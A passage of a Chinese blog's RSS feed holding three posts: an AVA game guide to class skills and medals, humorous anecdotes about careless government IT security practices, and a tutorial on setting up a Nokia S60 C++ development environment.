玩家在“游戏大厅”→“我的信息”→“勋章信息”中就可以查询到游戏人物的勋章信息，ava勋章系统主要由 三部分组成：
1技能勋章

2英雄勋章

3战术勋章

每局游戏结束后满足相应的条件就会获得相应的勋章并同时 获得相应的补给或游戏币
通过以上的介绍相信各位玩家已经对ava的各兵种“技能”和“勋章”系统有了深入的了解， 希望这些文字能让玩家在ava中有更好游戏体验。祝各位游戏愉快！
相关文章

No Related Post

]]></description>
			<content:encoded><![CDATA[<p><span style="font-size: small;">在ava游戏中兵种是有“技能”和“勋章”的设定，而不同兵种“技能”又有所不同，　　为了让玩家更全面的了解ava的 “技能”和“勋章”概念，下面就具体介绍一下：<br />
一   如何查看ava游戏中不同兵种技能<br />
玩家在“游戏大厅”→“我的信息”→“技能信息”→“兵种技能”就可以查看所在账号中各个兵 种的技能获得情况。<img onclick="if(this.width&gt;=700)  window.open('http://www.4shell.org/wp-content/uploads/images/2010/02/020923r1V.jpg');" src="http://www.4shell.org/wp-content/uploads/images/2010/02/020923r1V.jpg" border="0" alt="" /></span></p>
<p><span style="font-size: small;"><span id="more-1589"></span><br />
二如何获得ava游戏中不同兵种的技能</span><br />
1侦查兵技能的获得方式<br />
<img onclick="if(this.width&gt;=700)  window.open('http://www.4shell.org/wp-content/uploads/images/2010/02/020923oUe.jpg');" src="http://www.4shell.org/wp-content/uploads/images/2010/02/020923oUe.jpg" border="0" alt="" /></p>
<p><img onclick="if(this.width&gt;=700)  window.open('http://www.4shell.org/wp-content/uploads/images/2010/02/020924Uss.jpg');" src="http://www.4shell.org/wp-content/uploads/images/2010/02/020924Uss.jpg" border="0" alt="" /></p>
<p><img onclick="if(this.width&gt;=700)  window.open('http://www.4shell.org/wp-content/uploads/images/2010/02/020924S2n.jpg');" src="http://www.4shell.org/wp-content/uploads/images/2010/02/020924S2n.jpg" border="0" alt="" /></p>
<p><img onclick="if(this.width&gt;=700)  window.open('http://www.4shell.org/wp-content/uploads/images/2010/02/020924lpf.jpg');" src="http://www.4shell.org/wp-content/uploads/images/2010/02/020924lpf.jpg" border="0" alt="" /></p>
<p><img onclick="if(this.width&gt;=700)  window.open('http://www.4shell.org/wp-content/uploads/images/2010/02/020924cK2.jpg');" src="http://www.4shell.org/wp-content/uploads/images/2010/02/020924cK2.jpg" border="0" alt="" /><br />
侦察兵技能全部获得后，就会得到“侦察兵队长纪念章”并获得5000游戏币<br />
<img onclick="if(this.width&gt;=700)  window.open('http://www.4shell.org/wp-content/uploads/images/2010/02/0209243bl.jpg');" src="http://www.4shell.org/wp-content/uploads/images/2010/02/0209243bl.jpg" border="0" alt="" /><br />
2步枪兵技能的获得方式<br />
<img onclick="if(this.width&gt;=700)  window.open('http://www.4shell.org/wp-content/uploads/images/2010/02/020925EKv.jpg');" src="http://www.4shell.org/wp-content/uploads/images/2010/02/020925EKv.jpg" border="0" alt="" /></p>
<p><img onclick="if(this.width&gt;=700)  window.open('http://www.4shell.org/wp-content/uploads/images/2010/02/020925uYo.jpg');" src="http://www.4shell.org/wp-content/uploads/images/2010/02/020925uYo.jpg" border="0" alt="" /></p>
<p><img onclick="if(this.width&gt;=700)  window.open('http://www.4shell.org/wp-content/uploads/images/2010/02/020925z8G.jpg');" src="http://www.4shell.org/wp-content/uploads/images/2010/02/020925z8G.jpg" border="0" alt="" /></p>
<p><img onclick="if(this.width&gt;=700)  window.open('http://www.4shell.org/wp-content/uploads/images/2010/02/020926972.jpg');" src="http://www.4shell.org/wp-content/uploads/images/2010/02/020926972.jpg" border="0" alt="" /></p>
<p><img onclick="if(this.width&gt;=700)  window.open('http://www.4shell.org/wp-content/uploads/images/2010/02/020926iLG.jpg');" src="http://www.4shell.org/wp-content/uploads/images/2010/02/020926iLG.jpg" border="0" alt="" /><br />
步Qiang技能全部获得后，就会得到“步**队长纪念章”并获得5000游戏币<br />
<img onclick="if(this.width&gt;=700)  window.open('http://www.4shell.org/wp-content/uploads/images/2010/02/020926xN7.jpg');" src="http://www.4shell.org/wp-content/uploads/images/2010/02/020926xN7.jpg" border="0" alt="" /><br />
3狙击手技能的获得方式<br />
<img onclick="if(this.width&gt;=700)  window.open('http://www.4shell.org/wp-content/uploads/images/2010/02/0209263WO.jpg');" src="http://www.4shell.org/wp-content/uploads/images/2010/02/0209263WO.jpg" border="0" alt="" /></p>
<p><img onclick="if(this.width&gt;=700)  window.open('http://www.4shell.org/wp-content/uploads/images/2010/02/02092610i.jpg');" src="http://www.4shell.org/wp-content/uploads/images/2010/02/02092610i.jpg" border="0" alt="" /><br />
<img onclick="if(this.width&gt;=700)  window.open('http://www.4shell.org/wp-content/uploads/images/2010/02/020927XOb.jpg');" src="http://www.4shell.org/wp-content/uploads/images/2010/02/020927XOb.jpg" border="0" alt="" /></p>
<p><img onclick="if(this.width&gt;=700)  window.open('http://www.4shell.org/wp-content/uploads/images/2010/02/020927jDn.jpg');" src="http://www.4shell.org/wp-content/uploads/images/2010/02/020927jDn.jpg" border="0" alt="" /></p>
<p><img onclick="if(this.width&gt;=700)  window.open('http://www.4shell.org/wp-content/uploads/images/2010/02/0209273hE.jpg');" src="http://www.4shell.org/wp-content/uploads/images/2010/02/0209273hE.jpg" border="0" alt="" /><br />
狙击手技能全部获得后，就会得到“狙击手队长纪念章”并获得5000游戏币<br />
<img onclick="if(this.width&gt;=700)  window.open('http://www.4shell.org/wp-content/uploads/images/2010/02/020927Tgc.jpg');" src="http://www.4shell.org/wp-content/uploads/images/2010/02/020927Tgc.jpg" border="0" alt="" /><br />
三ava游戏中不同兵种的重要技能解析<br />
1侦察兵<br />
相较另外两个兵种侦察兵的技能获得比较容易，但是一定要注意“战场了解术”是侦察兵最有用的的技能， “高级战场了解术”与“基本战场了解术”的分别是前者小地图的战场可视范围更大。<br />
<img onclick="if(this.width&gt;=700)  window.open('http://www.4shell.org/wp-content/uploads/images/2010/02/0209273eE.jpg');" src="http://www.4shell.org/wp-content/uploads/images/2010/02/0209273eE.jpg" border="0" alt="" /></p>
<p>2步Qiang手　 　步Qiang手的技能是最难练的，尤其是“投掷训练”和“瞄准射击”中的“手雷伤害”和“爆头”很多时候运气占很大的成分。     但是步**的技能中的“防御术”和“致命伤害防御术”又恰恰是所有兵种最实用的技能，下面有一组公式仅供玩家参考。　　“致命伤害防御术”　　1.头盔防 御技能:能增加头盔的吸收能力与耐久度，经过测试基本为15%左右　　2.2:高级头盔防御技能:能增加头盔的吸收能力与耐久度,经过测试基本为30%左 右　　“防御术”　　1.初级防御技能:能增加武器吸收**伤害的效果,经过计算为2%左右　　2.中级防御技能:能增加武器吸收**伤害的效果,经过计 算为5%左右　　3:高级防御技能:能增加武器吸收**伤害的效果,经过计算为8%左右</p>
<p>3狙击手　　狙击手的技能获得方式介于其它两种兵种之间，只是“***训练”需要切换到***射杀这 对擅长远距离狙击手们来说是不小的挑战。</p>
<p>四ava游 戏勋章系统</p>
<p>玩家在“游戏大厅”→“我的信息”→“勋章信息”中就可以查询到游戏人物的勋章信息，ava勋章系统主要由 三部分组成：</p>
<p>1技能勋章<br />
<img onclick="if(this.width&gt;=700)  window.open('http://www.4shell.org/wp-content/uploads/images/2010/02/020928sDS.jpg');" src="http://www.4shell.org/wp-content/uploads/images/2010/02/020928sDS.jpg" border="0" alt="" height="700" /></p>
<p>2英雄勋章<br />
<img onclick="if(this.width&gt;=700)  window.open('http://www.4shell.org/wp-content/uploads/images/2010/02/020928Kjd.jpg');" src="http://www.4shell.org/wp-content/uploads/images/2010/02/020928Kjd.jpg" border="0" alt="" /></p>
<p>3战术勋章<br />
<img onclick="if(this.width&gt;=700)  window.open('http://www.4shell.org/wp-content/uploads/images/2010/02/020928XbJ.jpg');" src="http://www.4shell.org/wp-content/uploads/images/2010/02/020928XbJ.jpg" border="0" alt="" height="700" /></p>
<p>每局游戏结束后满足相应的条件就会获得相应的勋章并同时 获得相应的补给或游戏币<img onclick="if(this.width&gt;=700)  window.open('http://www.4shell.org/wp-content/uploads/images/2010/02/020928yOW.jpg');" src="http://www.4shell.org/wp-content/uploads/images/2010/02/020928yOW.jpg" border="0" alt="" /></p>
<p>通过以上的介绍相信各位玩家已经对ava的各兵种“技能”和“勋章”系统有了深入的了解， 希望这些文字能让玩家在ava中有更好游戏体验。祝各位游戏愉快！<br />
<h3>相关文章</h3>
<ul class="related_post">
<li>No Related Post</li>
</ul>
]]></content:encoded>
			<wfw:commentRss>http://www.4shell.org/archives/1589.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>经典n则</title>
		<link>http://www.4shell.org/archives/1564.html</link>
		<comments>http://www.4shell.org/archives/1564.html#comments</comments>
		<pubDate>Sun, 21 Feb 2010 01:32:04 +0000</pubDate>
		<dc:creator>Chinadu</dc:creator>
				<category><![CDATA[影音娱乐]]></category>
		<category><![CDATA[大杂烩]]></category>

		<guid isPermaLink="false">http://www.4shell.org/archives/1564.html</guid>
		<description><![CDATA[某业内人士  10:06:01
有些zf技术人员水平差的无法理解，说说我以前遇到过的一次：
某单位网站服务器被黑了，他打电话求助别人帮他改了密码，然后登录，我看他老把密码输入在用户名处登不进，我很纳闷这是干什么？我也没提醒他，过了 好久他不得不向我求助说进不了，然后我教他用户名处输入用户名，密码处输入密码，他感谢我说又学了一个技巧。我很纳闷，问他你在这做网管做多久了，他说做 了有五年了。我看他桌子上还摆了一大堆的技术书籍。
其实这样的事情数不胜数，跟朋友闲聊得知有很多类似荒诞的事让人抓狂：
朋友给一家zf单位做安全检查和加固，发现所有主机管理员密码全部是123456，叫技术人员们改密码，他们很怀疑的眼光说，密码没告诉别人，黑客 怎么能知道？朋友解释这个密码太简单，靠手工猜测就能猜出来，他说黑客哪有可能偏会猜这个呢？然后又解释一堆，说黑客字典里都有这个密码，他还是不理解， 怎么会有？我没告诉他们啊，怎么黑客字典里都有呢！%￥(&#38;^&#38;
然后给的安全解决方案其中一项就是改密码。数日后，zf技术人员打来电话，问“怎么这么久你还没给我改密码，我要投诉你！”然后又解释了一大堆，密 码是他们自己内部改，让他改他就知道了！他还是不理解，你们不是做安全的么，密码不由你们改谁改？^%&#38;%^$&#38;^%
还有的技术人员也不是不懂技术：
某地做安全检查，朋友检查发现木马要把木马清掉，负责人说不要清掉!你清掉了，黑客进不来他们万一采取更大的报复怎么办？无语。。。
某业内人士   11:43:44
有的黑客也经典
某业内人士  11:44:31
某地发生DoS攻击，我去应急，黑客打来电话，逼要系统密码，否则就一直DoS
某业内人士  11:44:46
我和客户都哭笑不得
相关文章

为什么近几年公开的技术交流越来越少
《阿凡达》告诉我们：谁胯下的鸟大就听谁的
看看当年的2B版&#8221;Dir溢出&#8221;娱乐一下
汇报漏洞时，我所面对的几种公司态度
雷人版《潇洒走一回》
你以前没看过的99句互联网上暴强语录
超强牛人酒后驾驶面对记者还摆出各种POSE
从蜗居看老男人的魅力
Blog搬家成功
【转载】我和老公的那些害羞事儿

]]></description>
			<content:encoded><![CDATA[<p>某业内人士  10:06:01<br />
有些zf技术人员水平差的无法理解，说说我以前遇到过的一次：</p>
<p>某单位网站服务器被黑了，他打电话求助别人帮他改了密码，然后登录，我看他老把密码输入在用户名处登不进，我很纳闷这是干什么？我也没提醒他，过了 好久他不得不向我求助说进不了，然后我教他用户名处输入用户名，密码处输入密码，他感谢我说又学了一个技巧。我很纳闷，问他你在这做网管做多久了，他说做 了有五年了。我看他桌子上还摆了一大堆的技术书籍。</p>
<p>其实这样的事情数不胜数，跟朋友闲聊得知有很多类似荒诞的事让人抓狂：</p>
<p>朋友给一家zf单位做安全检查和加固，发现所有主机管理员密码全部是123456，叫技术人员们改密码，他们很怀疑的眼光说，密码没告诉别人，黑客 怎么能知道？朋友解释这个密码太简单，靠手工猜测就能猜出来，他说黑客哪有可能偏会猜这个呢？然后又解释一堆，说黑客字典里都有这个密码，他还是不理解， 怎么会有？我没告诉他们啊，怎么黑客字典里都有呢！%￥(&amp;^&amp;</p>
<p>然后给的安全解决方案其中一项就是改密码。数日后，zf技术人员打来电话，问“怎么这么久你还没给我改密码，我要投诉你！”然后又解释了一大堆，密 码是他们自己内部改，让他改他就知道了！他还是不理解，你们不是做安全的么，密码不由你们改谁改？^%&amp;%^$&amp;^%</p>
<p>还有的技术人员也不是不懂技术：<br />
某地做安全检查，朋友检查发现木马要把木马清掉，负责人说不要清掉!你清掉了，黑客进不来他们万一采取更大的报复怎么办？无语。。。</p>
<p>某业内人士   11:43:44<br />
有的黑客也经典</p>
<p>某业内人士  11:44:31<br />
某地发生DoS攻击，我去应急，黑客打来电话，逼要系统密码，否则就一直DoS<br />
某业内人士  11:44:46<br />
我和客户都哭笑不得<br />
<h3>相关文章</h3>
<ul class="related_post">
<li><a href="http://www.4shell.org/archives/1592.html" title="为什么近几年公开的技术交流越来越少">为什么近几年公开的技术交流越来越少</a></li>
<li><a href="http://www.4shell.org/archives/1590.html" title="《阿凡达》告诉我们：谁胯下的鸟大就听谁的">《阿凡达》告诉我们：谁胯下的鸟大就听谁的</a></li>
<li><a href="http://www.4shell.org/archives/1467.html" title="看看当年的2B版&#8221;Dir溢出&#8221;娱乐一下">看看当年的2B版&#8221;Dir溢出&#8221;娱乐一下</a></li>
<li><a href="http://www.4shell.org/archives/1463.html" title="汇报漏洞时，我所面对的几种公司态度">汇报漏洞时，我所面对的几种公司态度</a></li>
<li><a href="http://www.4shell.org/archives/1450.html" title="雷人版《潇洒走一回》">雷人版《潇洒走一回》</a></li>
<li><a href="http://www.4shell.org/archives/1380.html" title="你以前没看过的99句互联网上暴强语录">你以前没看过的99句互联网上暴强语录</a></li>
<li><a href="http://www.4shell.org/archives/1378.html" title="超强牛人酒后驾驶面对记者还摆出各种POSE">超强牛人酒后驾驶面对记者还摆出各种POSE</a></li>
<li><a href="http://www.4shell.org/archives/1376.html" title="从蜗居看老男人的魅力">从蜗居看老男人的魅力</a></li>
<li><a href="http://www.4shell.org/archives/1347.html" title="Blog搬家成功">Blog搬家成功</a></li>
<li><a href="http://www.4shell.org/archives/1324.html" title="【转载】我和老公的那些害羞事儿">【转载】我和老公的那些害羞事儿</a></li>
</ul>
]]></content:encoded>
			<wfw:commentRss>http://www.4shell.org/archives/1564.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>S60智能手机开发环境搭建</title>
		<link>http://www.4shell.org/archives/1563.html</link>
		<comments>http://www.4shell.org/archives/1563.html#comments</comments>
		<pubDate>Sun, 14 Feb 2010 14:25:55 +0000</pubDate>
		<dc:creator>Chinadu</dc:creator>
				<category><![CDATA[技术文章]]></category>
		<category><![CDATA[S60]]></category>

		<guid isPermaLink="false">http://www.4shell.org/archives/1563.html</guid>
		<description><![CDATA[摘要：S60是目前智能手机市场占有率最大 的手机平台，具有扩展性好、占用硬件资源少的特点，诺基亚依托此平台，发布了多款深受消费者喜爱的智能手机。本文首先介绍S60手机软件开发过程，然后说 明如何通过互联网上获得的各种免费软件包搭建S60软件开发环境，最后描述了验证开发环境正确性的方法。
关键 词：Symbian；S60；智能手机 Symbian操作系统与S60平台介绍
S60软件开发过程概述
S60软件 开发过程和传统的PC软件开发过程有较大区别。在PC软件开发过程中，编译开发环境即是软件运行环境，我们既在PC上开发程序，又在PC上部署最终开发完 成的软件，其开发过程一般分为程序编写、程序调试和发布三个步骤，如图3-1所示。


而在S60软 件开发过程中，由于手机平台的运算能力和I/O能力有限，不可能直接在手机上编写和编译程序，只能先在PC上编写、编译程序，再到手机上调试、运行。因为 Intel  X86架构的目标码和S60手机的目标码是不兼容的，在PC上编译生成的手机程序是不可能直接在PC上运行的。为了简化编译-调试过程，S60  SDK中包含一个手机模拟器，它运行于微软Windows平台，开发者可以直接在模拟器中运行调试程序，而不必依赖于手机，这样大大提高了手机软件的开发 效率。
S60软件开发过程分为程序编写、程序调试、手机测试和发布四个步骤，如图3-2所示。

开发环境搭建
安装包准备
S60手机开发环境由JDK、ActivePerl、S60 C++ SDK和Carbide  C++等软件包（软件环境）构成，其中Cabide C++是集成开发环境，也可以选用其它的同类软件，例如Visual Studio  2003。它们都是可通过互联网自由下载的免费软件。
JDK 5.0 Update 16
S60  SDK中的部分工具程序是Java程序，依赖于JVM环境。Carbide  C++也是由Java语言开发，依赖于JVM。JDK由SUN公司提供，包含JVM，和S60 SDK配合比较好的版本是JDK 5.0 Update  16，下载地址是http://java.sun.com。
ActivePerl 5.6.1.635
S60  SDK的编译工具大都由Perl脚本编写而成，因此依赖于Windows平台下的Perl环境。ActivePerl由ActiveState公司提供， 下载地址是http://downloads.activestate.com/ActivePerl/。
S60 Platform  SDK for C++, 3rd Edition FP2
S60  SDK中包含了开发S60程序所需的各种工具和程序库，以及手机模拟器。S60  SDK由诺基亚提供，下载地址是http://www.forum.nokia.com。
Carbide C++ Express  1.3
Carbide  [...]]]></description>
			<content:encoded><![CDATA[<p>摘要：S60是目前智能手机市场占有率最大 的手机平台，具有扩展性好、占用硬件资源少的特点，诺基亚依托此平台，发布了多款深受消费者喜爱的智能手机。本文首先介绍S60手机软件开发过程，然后说 明如何通过互联网上获得的各种免费软件包搭建S60软件开发环境，最后描述了验证开发环境正确性的方法。<br />
关键 词：Symbian；S60；智能手机 Symbian操作系统与S60平台介绍<br />
S60软件开发过程概述<br />
S60软件 开发过程和传统的PC软件开发过程有较大区别。在PC软件开发过程中，编译开发环境即是软件运行环境，我们既在PC上开发程序，又在PC上部署最终开发完 成的软件，其开发过程一般分为程序编写、程序调试和发布三个步骤，如图3-1所示。<br />
<a href="http://lwx123.javaeye.com/library/files/20090721142832/20090721150782/20090729150147000.jpg" target="_blank"><img src="http://www.4shell.org/wp-content/uploads/images/2010/02/142555l3w.jpg" border="0" alt="点击查看全图" width="469" height="146" /></a><br />
<span id="more-1563"></span><br />
而在S60软 件开发过程中，由于手机平台的运算能力和I/O能力有限，不可能直接在手机上编写和编译程序，只能先在PC上编写、编译程序，再到手机上调试、运行。因为 Intel  X86架构的目标码和S60手机的目标码是不兼容的，在PC上编译生成的手机程序是不可能直接在PC上运行的。为了简化编译-调试过程，S60  SDK中包含一个手机模拟器，它运行于微软Windows平台，开发者可以直接在模拟器中运行调试程序，而不必依赖于手机，这样大大提高了手机软件的开发 效率。<br />
S60软件开发过程分为程序编写、程序调试、手机测试和发布四个步骤，如图3-2所示。<br />
<a href="http://lwx123.javaeye.com/library/files/20090721142832/20090721150782/20090729150201000.jpg" target="_blank"><img src="http://www.4shell.org/wp-content/uploads/images/2010/02/142555JkI.jpg" border="0" alt="点击查看全图" width="506" height="132" /></a></p>
<p>开发环境搭建<br />
安装包准备<br />
S60手机开发环境由JDK、ActivePerl、S60 C++ SDK和Carbide  C++等软件包（软件环境）构成，其中Cabide C++是集成开发环境，也可以选用其它的同类软件，例如Visual Studio  2003。它们都是可通过互联网自由下载的免费软件。<br />
JDK 5.0 Update 16<br />
S60  SDK中的部分工具程序是Java程序，依赖于JVM环境。Carbide  C++也是由Java语言开发，依赖于JVM。JDK由SUN公司提供，包含JVM，和S60 SDK配合比较好的版本是JDK 5.0 Update  16，下载地址是http://java.sun.com。<br />
ActivePerl 5.6.1.635<br />
S60  SDK的编译工具大都由Perl脚本编写而成，因此依赖于Windows平台下的Perl环境。ActivePerl由ActiveState公司提供， 下载地址是http://downloads.activestate.com/ActivePerl/。<br />
S60 Platform  SDK for C++, 3rd Edition FP2<br />
S60  SDK中包含了开发S60程序所需的各种工具和程序库，以及手机模拟器。S60  SDK由诺基亚提供，下载地址是http://www.forum.nokia.com。<br />
Carbide C++ Express  1.3<br />
Carbide  C++是基于Eclipse平台实现的集成开发环境，专为开发S60程序设计，由诺基亚提供，下载地址是 http://www.forum.nokia.com。<br />
安装软件包<br />
上述四种安装包相互之间存在依赖关系，必须按特 定的安装顺序安装，推荐的安装顺序是：JDK → ActivePerl → S60 SDK → Carbide C++。<br />
S60  SDK要求和开发者创建的源代码存在于同一个硬盘分区下，为了避免兼容性问题，最好将上述安装包都安装在C盘。在安装过程中，无需变更选项，直接使用默认 选项安装即可。<br />
验证开发环境<br />
在安装工作完成后，我们将编译S60  SDK中的一个例子来验证开发环境的完整性和正确。这个例子是“helloworldbasic”，位于 “C:S60devicesS60_3rd_FP2_SDKS60CppExamples”目录中。<br />
首先，启动Carbide  C++，选择菜单[File]→[Import…]导入“helloworldbasic”项目。Carbide  C++包含一个项目导入向导，引导开发者导入项目配置。在此向导中，选择例子程序所在的目录，其它选项均使用默认值，即可成功导入这个项目并在 Carbide C++中打开。<br />
为模拟器编译<br />
项目打开后，默认即是模拟器编译配置，选择菜单 [Run]→[Debug As] →[Debug Symbian OS Application]，Carbide  C++会自动编译项目，然后调用SDK中的模拟器运行这个程序。编译开始后，可以看到Carbide  C++的Console窗口不断输出编译信息，如果编译过程中发生错误，Console窗口中会显示相关的错误信息。<br />
为手机编译<br />
首 先，选择菜单[Project]→[Build Configurations] →[Set Active] →[Phone  Release]，将编译配置切换至手机发布状态。然后，选择菜单[Project] →[Build  Project]开始编译手机软件包。Console窗口中仍然会显示相关的编译信息。<br />
编译完成后，在例子项目的“sis”目录中会生 成手机安装包。使用数据线连接手机和PC，即可将“helloworldbasic”安装到手机上运行。<br />
参考文献：<br />
[1]Babbin,  Steve/ Harrison, Richard. Developing Software for Symbian OS. John  Wiley &amp; Sons, Ltd, 2006<br />
[2]Leigh Edwards, Richard Barker.  Developing Series 60 Applications. Nokia<br />
<h3>相关文章</h3>
<ul class="related_post">
<li><a href="http://www.4shell.org/archives/714.html" title="诺基亚S60短信攻击详细操作">诺基亚S60短信攻击详细操作</a></li>
<li><a href="http://www.4shell.org/archives/713.html" title="诺基亚S60平台手机短信漏洞深度分析">诺基亚S60平台手机短信漏洞深度分析</a></li>
</ul>
]]></content:encoded>
			<wfw:commentRss>http://www.4shell.org/archives/1563.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
